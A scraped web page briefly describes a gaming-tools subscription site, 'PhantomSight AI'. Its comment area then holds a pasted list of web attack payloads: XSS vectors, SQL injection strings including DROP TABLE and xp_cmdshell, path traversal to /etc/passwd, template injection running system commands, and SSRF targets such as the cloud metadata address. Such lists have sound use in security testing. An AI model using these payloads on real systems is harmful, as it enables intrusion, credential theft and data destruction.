Home | PhantomSight AI
PhantomSight AI presents a subscription-based AI-driven platform that markets advanced gaming tools and automation for real-time target identification and performance optimization. The site details features, system requirements, and installation options while outlining access for members through contests, a member realm, affiliate and reseller sign-up, and customer support resources for a tech-focused gaming audience.
We analyze text and images across millions of websites using similarity detection to identify large-scale content duplication and reuse.
This signal indicates whether widespread duplication patterns were detected at the time of analysis.
Signals update over time.
Discussion
Log in to comment or vote.
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<input autofocus onfocus=alert('XSS')>
"><script>alert(document.cookie)</script>
';alert('XSS');//
<a href="javascript:alert('XSS')">click</a>
<details open ontoggle=alert('XSS')>
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' UNION SELECT null, username, password FROM users --
1; DROP TABLE users; --
' AND 1=0 UNION SELECT table_name FROM information_schema.tables --
'; EXEC xp_cmdshell('dir'); --
' OR SLEEP(5) --
```
---
## 📁 Path Traversal Payloads
```
../../../etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
/etc/passwd%00
```
---
## 🔁 SSTI (Server-Side Template Injection)
```
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
{{config}}
{{''.__class__.__mro__[2].__subclasses__()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
```
---
## 🌊 Buffer Overflow / Overload Strings
```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
%x%x%x%x%x%x%x%x%x%x%x%x%x%x
```
---
## 🧬 Special Character Chaos (Multi-context)
```
<>"'`;(){}[]|&$!@#%^*\
\x00\x1a\xff
\u0000\uFFFD\uFEFF
```
---
## 🔗 SSRF (Server-Side Request Forgery)
```
http://localhost/admin
http://127.0.0.1:22
http://169.254.169.254/latest/meta-data/
http://[::1]/
http://0.0.0.0:80